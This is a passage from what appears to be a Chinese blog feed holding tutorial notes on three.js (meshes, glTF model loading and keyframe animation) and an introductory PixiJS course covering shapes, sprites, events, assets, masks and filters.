    • function createAxesHelper() {}:创建坐标轴。
      • const helper = new AxesHelper(3);:显示的坐标轴长度为 $3$。
      • helper.position.set(-3.5, 0, -3.5);:将坐标轴放置在 $(-3.5, 0, -3.5)$ 的位置。
    • function createGridHelper() {}:创建网格。
      • const helper = new GridHelper(6);:在 $xOz$ 平面创建 $6 \times 6$ 的网格,大小为 $1$。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import { AxesHelper, GridHelper } from 'three';

    function createAxesHelper() {
    const helper = new AxesHelper(3);
    helper.position.set(-3.5, 0, -3.5);
    return helper;
    }

    function createGridHelper() {
    const helper = new GridHelper(6);
    return helper;
    }

    export { createAxesHelper, createGridHelper };

    • ./meshes.js 导入 createMeshes,将这些 meshes 放在自己节点下。
    • tick(delta) {} 让车轮以每秒 $24^\circ$ 的速度旋转。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    import { Group, MathUtils } from 'three';

    import { createMeshes } from './meshes.js';

    const wheelSpeed = MathUtils.degToRad(24);

    class Train extends Group {
    constructor() {
    super();

    this.meshes = createMeshes();

    this.add(
    this.meshes.nose,
    this.meshes.cabin,
    this.meshes.chimney,
    this.meshes.smallWheelRear,
    this.meshes.smallWheelCenter,
    this.meshes.smallWheelFront,
    this.meshes.bigWheel,
    );
    }

    tick(delta) {
    this.meshes.bigWheel.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelRear.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelCenter.rotation.y += wheelSpeed * delta;
    this.meshes.smallWheelFront.rotation.y += wheelSpeed * delta;
    }
    }

    export { Train };

    原教程使用的是 BoxGeometryCylinderBufferGeometry,这似乎已弃用,应分别改为 BoxGeometry,CylinderGeometry

    • const cabin = new BoxGeometry(2, 2.25, 1.5);:创建一个立方体几何体,参数2, 2.25, 1.5分别对应立方体的宽度、高度和深度。
    • const wheel = new CylinderGeometry(0.4, 0.4, 1.75, 16);:创建一个圆柱形几何体。
      • 第一个和第二个参数0.75, 0.75分别是圆柱的顶部半径和底部半径。
      • 第三个参数3是圆柱的高度。
      • 第四个参数12定义了圆柱周围的面数,更高的值会使圆柱看起来更加圆滑。
      • const chimney = new CylinderGeometry(0.3, 0.1, 0.5); 同理。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    import { BoxGeometry, CylinderGeometry } from 'three';

    function createGeometries() {
    const cabin = new BoxGeometry(2, 2.25, 1.5);

    const nose = new CylinderGeometry(0.75, 0.75, 3, 12);

    // we can reuse a single cylinder geometry for all 4 wheels
    const wheel = new CylinderGeometry(0.4, 0.4, 1.75, 16);

    // different values for the top and bottom radius creates a cone shape
    const chimney = new CylinderGeometry(0.3, 0.1, 0.5);

    return {
    cabin,
    nose,
    wheel,
    chimney,
    };
    }

    export { createGeometries };
    • new MeshStandardMaterial({}); 创建一个标准材质。
      • flatShading: true,:开启平滑着色。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import { MeshStandardMaterial } from 'three';

    function createMaterials() {
    const body = new MeshStandardMaterial({
    color: 'firebrick',
    flatShading: true,
    });

    const detail = new MeshStandardMaterial({
    color: 'darkslategray',
    flatShading: true,
    });

    return { body, detail };
    }

    export { createMaterials };
    • function createMeshes() {}:根据 import { createGeometries } from './geometries.js';import { createMaterials } from './materials.js';,调整各组件的 transform,组装成小火车。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    import { Mesh } from 'three';

    import { createGeometries } from './geometries.js';
    import { createMaterials } from './materials.js';

    function createMeshes() {
    const geometries = createGeometries();
    const materials = createMaterials();

    const cabin = new Mesh(geometries.cabin, materials.body);
    cabin.position.set(1.5, 1.4, 0);

    const chimney = new Mesh(geometries.chimney, materials.detail);
    chimney.position.set(-2, 1.9, 0);

    const nose = new Mesh(geometries.nose, materials.body);
    nose.position.set(-1, 1, 0);
    nose.rotation.z = Math.PI / 2;

    const smallWheelRear = new Mesh(geometries.wheel, materials.detail);
    smallWheelRear.position.y = 0.5;
    smallWheelRear.rotation.x = Math.PI / 2;

    const smallWheelCenter = smallWheelRear.clone();
    smallWheelCenter.position.x = -1;

    const smallWheelFront = smallWheelRear.clone();
    smallWheelFront.position.x = -2;

    const bigWheel = smallWheelRear.clone();
    bigWheel.position.set(1.5, 0.9, 0);
    bigWheel.scale.set(2, 1.25, 2);

    return {
    nose,
    cabin,
    chimney,
    smallWheelRear,
    smallWheelCenter,
    smallWheelFront,
    bigWheel,
    };
    }

    export { createMeshes };

    演示

    1.13 以 glTF 格式加载 3D 模型

    在过去三十年左右的时间里,人们在创建标准 3D 资源交换格式方面进行了许多尝试。直到最近,FBXOBJ (Wavefront)DAE (Collada) 格式仍然是其中最受欢迎的格式,尽管它们都存在阻碍其广泛采用的问题。比如 OBJ 不支持动画,FBX 是属于 Autodesk 的封闭格式,Collada 规范过于复杂,导致大文件难以加载。

    然而,最近,一个名为 glTF 的新成员已成为在网络上交换 3D 资源的事实上的标准格式。glTFGL 传输格式),有时被称为 3D 中的 JPEG,由 Kronos Group 创建,他们负责 WebGL、OpenGL 和一大堆其他图形 API。glTF 最初于 2017 年发布,现在是在网络和许多其他领域交换 3D 资源的最佳格式。在本书中,我们将始终使用 glTF,如果可能,您也应该这样做。它专为在网络上共享模型而设计,因此文件大小尽可能小,并且您的模型将快速加载。

    但是,由于 glTF 相对较新,您最喜欢的应用程序可能还没有导出器。在这种情况下,您可以在使用模型之前将它们转换为 glTF,或者使用其他加载器,例如 FBXLoaderor 或者 OBJLoader。所有 three.js 加载器的工作方式相同,因此如果您确实需要使用另一个加载器,本章中的所有内容仍然适用,只有细微差别。

    原文极力推荐 .glb 格式,好吧,依他。

    Loader

    可以看到 three.js 支持好多种格式的文件,我们使用 GLTFLoader.js,它还需要依赖项 '../utils/BufferGeometryUtils.js'

    如果是本地加载,还应修改其相对地址:

    1
    import {XXX} from '../../../build/three.module.js';

    文件组织结构如下:

    • assets/models:存放着 3D 模型(.glb 格式)。
    • src/World/components/birds/
      • birds.js:导入模型,创建鸟对象。
      • setupModel.js:处理加载的数据。

    文件结构

    • await world.init();:等待模型加载完毕,才开始渲染。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    import { World } from './World/World.js';

    async function main() {
    // Get a reference to the container element
    const container = document.querySelector('#scene-container');

    // create a new world
    const world = new World(container);

    // complete async tasks
    await world.init();

    // start the animation loop
    world.start();
    }

    main().catch((err) => {
    console.error(err);
    });
    • async init() {}:等待模型加载完毕,才开始渲染。
      • const { parrot, flamingo, stork } = await loadBirds(); 异步加载模型。
      • controls.target.copy(parrot.position);:将场景控制的目标位置设置为 parrot 模型的位置。这通常用于确保相机能够围绕指定的点进行旋转或焦点对准,从而使用户的视角集中在这个点上。
      • scene.add(parrot, flamingo, stork); 将三只鸟加入场景。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    import { loadBirds } from './components/birds/birds.js';
    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let controls;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);
    controls = createControls(camera, renderer.domElement);

    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight);

    const resizer = new Resizer(container, camera, renderer);
    }

    async init() {
    const { parrot, flamingo, stork } = await loadBirds();

    // move the target to the center of the front bird
    controls.target.copy(parrot.position);

    scene.add(parrot, flamingo, stork);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };

    火烈鸟

    Blender 打开这个 .glb 模型,可以看到 Mesh_0 节点在 Object_0 下面,我们只需要 Mesh_0 这个节点,把它选取出来:

    1
    2
    3
    4
    5
    6
    7
    function setupModel(data) {
    const model = data.scene.children[0];

    return model;
    }

    export { setupModel };
    • async function loadBirds() {}:异步加载。

      • const loader = new GLTFLoader();:使得程序具有加载 .glb 文件的能力。

      • const [parrotData, flamingoData, storkData] = await Promise.all([...]);:异步加载模型。

      • const parrot = setupModel(parrotData);:生成 parrot 对象。

      • parrot.position.set(0, 0, 2.5);:设置对象位置。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

    import { setupModel } from './setupModel.js';

    async function loadBirds() {
    const loader = new GLTFLoader();

    const [parrotData, flamingoData, storkData] = await Promise.all([
    loader.loadAsync('assets/models/Parrot.glb'),
    loader.loadAsync('assets/models/Flamingo.glb'),
    loader.loadAsync('assets/models/Stork.glb'),
    ]);

    console.log('Squaaawk!', parrotData);

    const parrot = setupModel(parrotData);
    parrot.position.set(0, 0, 2.5);

    const flamingo = setupModel(flamingoData);
    flamingo.position.set(7.5, 0, -10);

    const stork = setupModel(storkData);
    stork.position.set(0, -2.5, -10);

    return {
    parrot,
    flamingo,
    stork,
    };
    }

    export { loadBirds };

    演示

    试试自己的模型:

    blender 把自己之前创建的模型导出成 .glb 格式:

    戴珍珠耳环的女孩

    代码就照葫芦画瓢了!

    演示

    1.14 three.js 动画系统

    创建动画涉及三个元素:关键帧、KeyframeTrackAnimationClip

    动画系统中最底层的概念级别是关键帧。每个关键帧由三部分信息组成:时间 time、属性 property 和值 value

    没有代表单个关键帧的类。相反,关键帧是存储在两个数组中的原始数据时间,在 KeyframeTrack中。

    创建一个代表不透明度的数字关键帧轨迹,包含五个关键帧

    1
    2
    3
    4
    5
    6
    import { NumberKeyframeTrack } from "three";

    const times = [0, 1, 2, 3, 4];
    const values = [0, 1, 0, 1, 0];

    const opacityKF = new NumberKeyframeTrack(".material.opacity", times, values);

    创建一个表示位置的矢量关键帧轨迹,包含三个关键帧

    1
    2
    3
    4
    5
    6
    import { VectorKeyframeTrack } from "three";

    const times = [0, 3, 6];
    const values = [0, 0, 0, 2, 2, 2, 0, 0, 0];

    const positionKF = new VectorKeyframeTrack(".position", times, values);

    动画剪辑是附加到单个对象的任意数量的关键帧的集合,表示剪辑的类是 AnimationClip

    动画位置和不透明度的剪辑

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    import { AnimationClip, NumberKeyframeTrack, VectorKeyframeTrack } from "three";

    const positionKF = new VectorKeyframeTrack(
    ".position",
    [0, 3, 6],
    [0, 0, 0, 2, 2, 2, 0, 0, 0]
    );

    const opacityKF = new NumberKeyframeTrack(
    ".material.opacity",
    [0, 1, 2, 3, 4, 5, 6],
    [0, 1, 0, 1, 0, 1, 0]
    );

    const moveBlinkClip = new AnimationClip("move-n-blink", -1, [
    positionKF,
    opacityKF,
    ]);

    • loop.updatables.push(parrot, flamingo, stork);:将 parrotflamingostork 加入 Loop 中以播放动画。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    import { loadBirds } from './components/birds/birds.js';
    import { createCamera } from './components/camera.js';
    import { createLights } from './components/lights.js';
    import { createScene } from './components/scene.js';

    import { createControls } from './systems/controls.js';
    import { createRenderer } from './systems/renderer.js';
    import { Resizer } from './systems/Resizer.js';
    import { Loop } from './systems/Loop.js';

    let camera;
    let controls;
    let renderer;
    let scene;
    let loop;

    class World {
    constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);
    controls = createControls(camera, renderer.domElement);

    const { ambientLight, mainLight } = createLights();

    loop.updatables.push(controls);
    scene.add(ambientLight, mainLight);

    const resizer = new Resizer(container, camera, renderer);
    }

    async init() {
    const { parrot, flamingo, stork } = await loadBirds();

    // move the target to the center of the front bird
    controls.target.copy(parrot.position);

    loop.updatables.push(parrot, flamingo, stork);
    scene.add(parrot, flamingo, stork);
    }

    render() {
    renderer.render(scene, camera);
    }

    start() {
    loop.start();
    }

    stop() {
    loop.stop();
    }
    }

    export { World };
    • const clip = data.animations[0];:获取 data 中的第一个动画(animations[0]),存储在变量 clip 中。
    • const mixer = new AnimationMixer(model);:使用刚刚获取的模型(model)创建一个AnimationMixer实例。这个实例将用于管理模型的动画。
    • const action = mixer.clipAction(clip);:使用 mixer.clipAction(clip) 创建一个针对特定动画片段(clip)的动画操作(action)。
    • action.play();:开始播放这个动画。
    • model.tick = (delta) => mixer.update(delta);:更新动画。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    import { AnimationMixer } from 'three';

    function setupModel(data) {
    const model = data.scene.children[0];
    const clip = data.animations[0];

    const mixer = new AnimationMixer(model);
    const action = mixer.clipAction(clip);
    action.play();

    model.tick = (delta) => mixer.update(delta);

    return model;
    }

    export { setupModel };

    演示

    ]]>
    @@ -3223,7 +3223,7 @@ /posts/Web-PixiJS/ - 资源

    课程

    01-Pixi 初识和搭建 Pixi 应用

    npm install -g @vue/cli
    • 全局安装 yarn
    npm install --g yarn
    • 项目文件下命令行创建 Vue 项目(好家伙这就 100 来 MB……):
    vue create 01-pixiapp

    创建 Vue

    • 转到这个项目:
    cd 01-pixiapp
    • 安装 pixi.js
    yarn add pixi.js
    • 启动项目:
    yarn serve

    启动服务器


    • 编辑 01-pixiapp/App.vue
    <template>
    <div></div>
    </template>

    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 填充颜色
    rectangle.drawRect(200, 200, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);

    </script>

    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>

    ​ HTML 下使用 <script src="https://pixijs.download/release/pixi.js"></script> 直接导入 pixi.js

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>
    </head>
    <body>
    </body>
    <script src="https://pixijs.download/release/pixi.js"></script>
    <script>
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 填充颜色
    rectangle.drawRect(200, 200, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    </script>
    </html>

    ​ Vue 代码解释:

    ​ 这部分定义了组件的 HTML 结构。在这个例子中,模板仅包含一个空的 <div> 元素。实际上,这个 <div> 在此示例中未直接使用,因为 PixiJS 的画布 (canvas) 是通过脚本直接添加到 document.body 中的,而不是被插入到这个 <div> 内。

    <template>
    <div></div>
    </template>

    ​ 这部分是组件的 JavaScript 逻辑,主要做了以下几件事情:

    1. 导入 PixiJS:使用 import 语句导入 PixiJS 库。
    2. 创建 PixiJS 应用:实例化一个新的 PixiJS Application 对象,并设置其大小和背景颜色等属性。这个应用对象会自动生成一个 <canvas> 元素。
    3. <canvas> 元素添加到 DOM:通过 document.body.appendChild(app.view); 将 PixiJS 创建的 <canvas> 元素添加到 HTML 文档的 <body> 中。
    4. 绘制图形:使用 PixiJS 的 Graphics 类创建一个矩形,并设置其填充颜色和位置,最后将这个矩形添加到 PixiJS 应用的舞台(stage)上,以便显示。
    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth, // 宽度设置为窗口宽度
    height: window.innerHeight, // 高度设置为窗口高度
    backgroundColor: 0x1099bb, // 背景颜色设置为浅蓝色
    resolution: window.devicePixelRatio || 1, // 分辨率设置为设备的像素比或默认值 1
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.beginFill(0x66ccff); // 开始填充颜色为浅蓝色
    rectangle.drawRect(200, 200, 164, 64); // 在坐标 (200, 200) 处绘制一个 164 x 64 大小的矩形
    rectangle.endFill(); // 结束填充

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    </script>

    ​ 这部分定义了页面的 CSS 样式:

    • 重置所有元素的 marginpadding,并设置 box-sizingborder-box,以确保布局的一致性。
    • 设置 <canvas> 元素的样式,使其宽度和高度分别占满视口的宽度和高度,并通过 position: fixed 确保 <canvas> 始终覆盖整个视口。
    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>

    ​ 打开 http://localhost:8080/

    渲染效果

    02-Pixi图形Graphics具体应用

    ​ 使用 Pixi 创建其它图形,设置:

    • 缩放:scale.set()
    • 位移:position.set()
    • 旋转:rotation
    • 锚点:pivot.set()
    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.lineStyle(4, 0xff0000, 1); // 设置边框样式:线宽,线颜色,透明度
    rectangle.beginFill(0x66ccff, 0.9); // 填充颜色
    rectangle.drawRect(0, 0, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充

    // 图形的缩放
    rectangle.scale.set(2, 2);
    // 图形的位移
    rectangle.position.set(100, 100);
    // 图形的旋转
    rectangle.rotation = 0.5;
    // 图形的锚点
    rectangle.pivot.set(82, 32);

    // 将矩形添加至舞台
    app.stage.addChild(rectangle);

    // 创建一个圆形
    const circle = new PIXI.Graphics();
    circle.beginFill(0x66ccff, 0.9);
    circle.drawCircle(0, 0, 32);
    circle.endFill();
    circle.position.set(300, 300);
    app.stage.addChild(circle);

    03-Pixi绘制各种常见图形

    // 创建一个矩形
    const rectangle = new PIXI.Graphics();
    rectangle.lineStyle(4, 0xff0000, 1); // 设置边框样式:线宽,线颜色,透明度
    rectangle.beginFill(0x66ccff, 0.9); // 填充颜色
    rectangle.drawRect(0, 0, 164, 64); // 绘制矩形
    rectangle.endFill(); // 结束填充
    // 图形的缩放
    rectangle.scale.set(2, 2);
    // 图形的位移
    rectangle.position.set(100, 100);
    // 图形的旋转
    rectangle.rotation = 0.5;
    // 图形的锚点
    rectangle.pivot.set(82, 32);
    // 将矩形添加至舞台
    app.stage.addChild(rectangle);
    // 创建一个圆形
    const circle = new PIXI.Graphics();
    circle.beginFill(0x66ccff, 0.9);
    circle.drawCircle(0, 0, 32);
    circle.endFill();
    circle.position.set(300, 300);
    app.stage.addChild(circle);
    // 创建圆角矩形
    const roundedRectangle = new PIXI.Graphics();
    roundedRectangle.beginFill(0x66ccff, 0.9);
    /* 绘制圆角矩形,
    第一个参数是 x 坐标,
    第二个参数是 y 坐标,
    第三个参数是宽度,
    第四个参数是高度,
    第五个参数是圆角半径
    */
    roundedRectangle.drawRoundedRect(0, 0, 164, 64, 10);
    roundedRectangle.endFill();
    roundedRectangle.position.set(500, 500);
    app.stage.addChild(roundedRectangle);
    // 绘制椭圆
    const ellipse = new PIXI.Graphics();
    ellipse.beginFill(0x66ccff, 0.9);
    /* 绘制椭圆,
    第一个参数是 x 坐标,
    第二个参数是 y 坐标,
    第三个参数是宽度,
    第四个参数是高度
    */
    ellipse.drawEllipse(0, 0, 164, 164);
    ellipse.endFill();
    ellipse.position.set(700, 700);
    app.stage.addChild(ellipse);
    // 绘制多边形
    const polygon = new PIXI.Graphics();
    polygon.beginFill(0x66ccff, 0.9);
    // 绘制多边形,参数是一个数组,数组中的每个元素是一个点的坐标,每两个元素是一个点的 x 坐标和 y 坐标。
    polygon.drawPolygon([0, 0, 100, 0, 100, 100, 0, 100]);
    polygon.endFill();
    polygon.position.set(50, 300);
    app.stage.addChild(polygon);
    // 绘制圆弧(扇形)
    const arc = new PIXI.Graphics();
    arc.beginFill(0x660000, 0.9);
    /* 绘制圆弧,
    第一个参数是 x 坐标,
    第二个参数是 y 坐标,
    第三个参数是半径,
    第四个参数是起始角度,
    第五个参数是结束角度。
    第六个参数是是否逆时针
    */
    arc.arc(0, 0, 32, 0, Math.PI, false);
    arc.endFill();
    arc.position.set(300, 50);
    app.stage.addChild(arc);
    // 绘制线段
    const line = new PIXI.Graphics();
    line.lineStyle(4, 0xff0000, 1);
    line.moveTo(0, 0); // 设置线段的起始点
    line.lineTo(100, 100); // 设置线段的结束点
    line.lineTo(200, 0);
    line.position.set(500, 50);
    app.stage.addChild(line);

    渲染效果

    04-Pixi纹理与动画实现

    ​ 使用代码创建一个木剑的旋转动画:

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");

    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);

    // 设置精灵的锚点
    sprite.anchor.set(0.5, 0.5);

    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵旋转 45 度
    sprite.rotation = Math.PI / 4;

    // 设置精灵的缩放
    sprite.scale.set(2, 2);

    // 设置精灵的透明度
    sprite.alpha = 0.5;

    app.stage.addChild(sprite);

    // ticker 实现动画
    app.ticker.add((delta) => {
    console.log(delta);
    sprite.rotation += 0.01 * delta;
    })

    演示

    05-Pixi事件交互

    ​ 在上一节的代码上,继续追加交互的代码:

    sprite.interactive = true;
    sprite.on("click", () => {
    sprite.alpha = 1;
    });
    sprite.on("pointerenter", () => {
    sprite.alpha = 0.75;
    });
    sprite.on("pointerout", () => {
    sprite.alpha = 0.5;
    });

    ​ 如下所示,当鼠标点击 / 移入 / 移出 木剑时,将产生一定的交互效果。

    演示

    06-Pixi资源管理

    ​ 两种不同的资源加载方式:

    // 添加资源
    PIXI.Assets.add("sword", "./textures/jian.png");
    PIXI.Assets.add("man", "./textures/man.png");
    PIXI.Assets.add("woodenSword", "./textures/mujian.png");

    // 异步加载资源
    const texturesPromise = PIXI.Assets.load(["sword", "man", "woodenSword"], (progress) => {
    console.log("加载完成:", progress);
    });
    // 添加场景一资源
    PIXI.Assets.addBundle("scene1", {
    sword: "./textures/jian.png",
    man: "./textures/man.png",
    woodenSword: "./textures/mujian.png",
    });

    const texturesPromise = PIXI.Assets.loadBundle("scene1", (progress) => {
    console.log("加载完成:", progress);
    });

    ​ 操作一下所创建的资源对象 texturesPromise

    // 加载完成后创建精灵
    texturesPromise.then((textures) => {
    // 创建容器
    const container = new PIXI.Container();
    // 创建精灵
    const sprite = new PIXI.Sprite(textures.sword);
    // 设置精灵位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;
    // 设置精灵锚点
    sprite.anchor.set(0.5);
    // 设置精灵缩放
    sprite.scale.set(0.5);
    // 设置精灵透明度
    sprite.alpha = 0.5;
    // 设置精灵旋转
    sprite.rotation = 0.5;
    // 设置精灵混合模式
    sprite.blendMode = PIXI.BLEND_MODES.ADD;
    // 设置精灵交互
    sprite.interactive = true;
    // 设置精灵鼠标样式
    sprite.buttonMode = true;
    // 设置精灵鼠标事件
    sprite.on("pointerdown", () => {
    console.log("pointerdown");
    });
    container.addChild(sprite);

    // 创建精灵
    const sprite2 = new PIXI.Sprite(textures.man);
    sprite2.scale.set(0.1);
    container.addChild(sprite2);
    app.stage.addChild(container);
    });

    演示

    07-Pixi文字与遮罩

    new PIXI.Text() 创建文字对象:

    // 显示 hello world 文字
    const text = new PIXI.Text("Hello World", {
    fontFamily: "Arial",
    fontSize: 120,
    fill: 0xff0000,
    align: "center",
    });

    // 设置文字位置
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;

    // 设置文字锚点
    text.anchor.set(0.5);
    app.stage.addChild(text);

    演示

    mask 给精灵设置另一个精灵做遮罩:

    // 创建一个精灵
    const bg = PIXI.Sprite.from("./textures/bg.png");
    bg.width = app.screen.width;
    bg.height = app.screen.height;
    // 使用文字作为精灵的遮罩
    bg.mask = woodenSword;
    app.stage.addChild(bg);
    app.stage.addChild(woodenSword);

    演示

    ​ 使用文字作为遮罩:

    // 显示 hello world 文字
    const text = new PIXI.Text("Hello World", {
    fontFamily: "Arial",
    fontSize: 120,
    fill: 0xff0000,
    align: "center",
    });

    // 设置文字位置
    text.x = app.screen.width / 2;
    text.y = app.screen.height / 2;

    // 设置文字锚点
    text.anchor.set(0.5);

    // 创建一个精灵
    const bg = PIXI.Sprite.from("./textures/bg.png");
    bg.width = app.screen.width;
    bg.height = app.screen.height;
    // 使用文字作为精灵的遮罩
    bg.mask = text;
    app.stage.addChild(bg);

    演示

    08-Pixi滤镜特效

    ​ 先创建一个精灵用于操作:

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加至舞台
    app.stage.addChild(sprite);

    自带滤镜:模糊

    // 创建模糊滤镜
    const blurFilter = new PIXI.BlurFilter();
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 20;
    // 将模糊滤镜添加到精灵上
    sprite.filters = [blurFilter];

    // 监听鼠标是否进入精灵
    sprite.interactive = true;
    sprite.on("pointerover", () =>{
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 0;
    });
    sprite.on("pointerout", () =>{
    // 设置模糊滤镜的模糊程度
    blurFilter.blur = 20;
    });

    演示

    pixi-filters:扩展滤镜:轮廓与辉光

    ​ 使用:

    yarn add pixi-filters

    安装,然后使用

    import {XXXFilter} from "pixi-filters";

    来导入。

    Vue 下输入代码:

    <template>
    <div></div>
    </template>

    <script setup>
    // 导入 pixi.js
    import * as PIXI from 'pixi.js';
    import {OutlineFilter} from 'pixi-filters';
    import {GlowFilter} from 'pixi-filters';

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
    antialias: true, // 设置抗锯齿
    })

    // 将应用画布添加到 DOM 中
    document.body.appendChild(app.view);

    // 创建一个纹理
    const texture = PIXI.Texture.from("./textures/mujian.png");
    // 创建一个精灵
    const sprite = new PIXI.Sprite(texture);
    // 设置精灵的位置
    sprite.x = app.screen.width / 2;
    sprite.y = app.screen.height / 2;

    // 设置精灵的锚点
    sprite.anchor.set(0.5);

    // 将精灵添加到舞台
    app.stage.addChild(sprite);

    //创建轮廓滤镜
    const outlineFilter = new OutlineFilter(5, 0xffff00); // 2 为轮廓宽度,0x000000 为轮廓颜色
    // 创建发光滤镜
    const glowFilter = new GlowFilter({
    distance: 50,
    outerStrength: 1,
    innerStrength: 0,
    color: 0xff0000,
    quality: 0.5,
    });
    // 将轮廓滤镜添加到精灵上
    sprite.filters = [outlineFilter, glowFilter];

    </script>

    <style>
    * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    }
    canvas {
    width: 100vw;
    height: 100vh;
    position: fixed;
    left: 0;
    }
    </style>
    <script src="https://cdn.jsdelivr.net/npm/pixi-filters@latest/dist/browser/pixi-filters.min.js"></script>

    ​ HTML 下使用代码(将 OutlineFilterGlowFilter 分别改为 new PIXI.filters.OutlineFilterPIXI.filters.GlowFilter):

    // 创建应用
    const app = new PIXI.Application({
    width: window.innerWidth,
    height: window.innerHeight,
    backgroundColor: 0x1099bb,
    resolution: window.devicePixelRatio || 1,
